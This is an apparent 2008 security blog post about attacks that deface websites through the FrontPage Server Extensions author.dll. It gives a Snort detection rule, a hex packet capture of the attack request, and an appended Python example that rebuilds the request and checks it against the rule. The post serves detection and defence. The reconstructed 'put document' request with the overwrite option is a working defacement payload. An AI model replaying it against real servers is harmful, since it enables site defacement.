Monday, September 8, 2008

LinuXploit Crew Frontpage author.dll core-project/1.0 attacks

Received some reports of widespread FrontPage Server Extensions attacks (old, but still working). Example of a hacked site

Here is a quick Snort signature I whipped up for detection/protection, followed by the associated traffic (thanks to Jack Pepper for the tcpdump capture):

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"WEB linuXploit crew Frontpage author.dll attempt"; flow:established,to_server; content:"POST"; nocase; uricontent:"_vti_aut/"; nocase; uricontent:"author.dll"; nocase; content:"core-project"; nocase; reference:url,infosec20.blogspot.com; classtype:web-application-attack; sid:3001728; rev:2;)


The browser type (User-Agent) is core-project/1.0, as seen in the capture:

0x0030: 0000 0000 504f 5354 202f 5f76 7469 5f62 ....POST./_vti_b
0x0040: 696e 2f5f 7674 695f 6175 742f 6175 7468 in/_vti_aut/auth
0x0050: 6f72 2e64 6c6c 2048 5454 502f 312e 310d or.dll.HTTP/1.1.
0x0060: 0a4d 494d 452d 5665 7273 696f 6e3a 2031 .MIME-Version:.1
0x0070: 2e30 0d0a 5573 6572 2d41 6765 6e74 3a20 .0..User-Agent:.
0x0080: 636f 7265 2d70 726f 6a65 6374 2f31 2e30 core-project/1.0
0x0090: 0d0a 486f 7374 3a20 7777 7777 2e61 6161 ..Host:.wwww.aaa
0x00a0: 6161 612e 6564 750d 0a41 6363 6570 743a aaa.edu..Accept:
0x00b0: 2061 7574 682f 7369 6369 6c79 0d0a 436f .auth/sicily..Co
0x00c0: 6e74 656e 742d 4c65 6e67 7468 3a20 3132 ntent-Length:.12
0x00d0: 3037 0d0a 436f 6e74 656e 742d 5479 7065 07..Content-Type
0x00e0: 3a20 6170 706c 6963 6174 696f 6e2f 782d :.application/x-
0x00f0: 7665 726d 6565 722d 7572 6c65 6e63 6f64 vermeer-urlencod
0x0100: 6564 0d0a 582d 5665 726d 6565 722d 436f ed..X-Vermeer-Co
0x0110: 6e74 656e 742d 5479 7065 3a20 6170 706c ntent-Type:.appl
0x0120: 6963 6174 696f 6e2f 782d 7665 726d 6565 ication/x-vermee
0x0130: 722d 7572 6c65 6e63 6f64 6564 0d0a 436f r-urlencoded..Co
0x0140: 6e6e 6563 7469 6f6e 3a20 636c 6f73 650d nnection:.close.
0x0150: 0a43 6163 6865 2d43 6f6e 7472 6f6c 3a20 .Cache-Control:.
0x0160: 6e6f 2d63 6163 6865 0d0a 0d0a 6d65 7468 no-cache....meth
0x0170: 6f64 3d70 7574 2b64 6f63 756d 656e 7425 od=put+document%
0x0180: 3361 3425 3265 3025 3265 3225 3265 3437 3a4%2e0%2e2%2e47
0x0190: 3135 2673 6572 7669 6365 2535 666e 616d 15&service%5fnam
0x01a0: 653d 2664 6f63 756d 656e 743d 2535 6264 e=&document=%5bd
0x01b0: 6f63 756d 656e 7425 3566 6e61 6d65 2533 ocument%5fname%3
0x01c0: 6469 2532 6568 746d 2533 626d 6574 6125 di%2ehtm%3bmeta%
0x01d0: 3566 696e 666f 2533 6425 3562 2535 6425 5finfo%3d%5b%5d%
0x01e0: 3564 2670 7574 2535 666f 7074 696f 6e3d 5d&put%5foption=
0x01f0: 6f76 6572 7772 6974 6526 636f 6d6d 656e overwrite&commen
0x0200: 743d 266b 6565 7025 3566 6368 6563 6b65 t=&keep%5fchecke
0x0210: 6425 3566 6f75 743d 6661 6c73 650a 3c68 d%5fout=false.<h
0x0220: 746d 6c3e 0d0a 3c68 6561 643e 0d0a 3c74 tml>..<head>..<t
0x0230: 6974 6c65 3e6c 696e 7558 706c 6f69 745f itle>linuXploit_
0x0240: 6372 6577 3c2f 7469 746c 653e 0d0a 3c6d crew</title>..<m
0x0250: 6574 6120 6874 7470 2d65 7175 6976 3d22 eta.http-equiv="
0x0260: 436f 6e74 656e 742d 5479 7065 2220 636f Content-Type".co
0x0270: 6e74 656e 743d 2274 6578 742f 6874 6d6c ntent="text/html
0x0280: 3b20 6368 6172 7365 743d 6973 6f2d 3838 ;.charset=iso-88
0x0290: 3539 2d31 223e 0d0a 3c2f 6865 6164 3e0d 59-1">..</head>.
0x02a0: 0a0d 0a3c 626f 6479 2062 6763 6f6c 6f72 ...<body.bgcolor
0x02b0: 3d22 2346 4646 4646 4622 3e0d 0a3c 6469 ="#FFFFFF">..<di
0x02c0: 7620 616c 6967 6e3d 2263 656e 7465 7222 v.align="center"
0x02d0: 3e0d 0a20 203c 703e 3c66 6f6e 7420 7369 >....<p><font.si
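As an added example (not from the original post), the captured request above reassembled as a constructed sample and run through the same conditions the Snort rule checks, plus a decoder for the x-vermeer-urlencoded parameter line that shows the "put document" RPC targeting i.htm with put_option=overwrite. The host name is the placeholder from the capture and the body is truncated the way the capture is.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample, reassembled (abridged) from the tcpdump capture above; the
# body is truncated like the capture, so Content-Length is nominal, not exact.
SAMPLE_REQUEST = (
    b"POST /_vti_bin/_vti_aut/author.dll HTTP/1.1\r\n"
    b"User-Agent: core-project/1.0\r\n"
    b"Host: wwww.aaaaaa.edu\r\n"
    b"Accept: auth/sicily\r\n"
    b"Content-Length: 1207\r\n"
    b"Content-Type: application/x-vermeer-urlencoded\r\n"
    b"Connection: close\r\n"
    b"Cache-Control: no-cache\r\n\r\n"
    b"method=put+document%3a4%2e0%2e2%2e4715&service%5fname=&document=%5bdocument"
    b"%5fname%3di%2ehtm%3bmeta%5finfo%3d%5b%5d%5d&put%5foption=overwrite&comment="
    b"&keep%5fchecked%5fout=false\n"
    b"<html>\r\n<head>\r\n<title>linuXploit_crew</title>\r\n"
)

def parse_request(raw):
    """Split a raw HTTP request into method, URI, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, uri, _ = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode(errors="replace")
    return {"method": method, "uri": uri, "headers": headers, "body": body, "raw": raw}

def matches_signature(req):
    """Same conditions as the Snort rule: POST, _vti_aut/ and author.dll in the
    URI (nocase), and 'core-project' anywhere in the payload (nocase)."""
    uri = req["uri"].lower()
    return (req["method"].upper() == b"POST" and b"_vti_aut/" in uri
            and b"author.dll" in uri and b"core-project" in req["raw"].lower())

def decode_author_rpc(body):
    """Decode the x-vermeer-urlencoded parameter line that precedes the file
    content and pull out the RPC method, target document and put option."""
    params = body.split(b"\n", 1)[0].decode(errors="replace")
    fields = {}
    for pair in params.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    m = re.search(r"document_name=([^;\]]+)", fields.get("document", ""))
    fields["document_name"] = m.group(1) if m else ""
    return fields
```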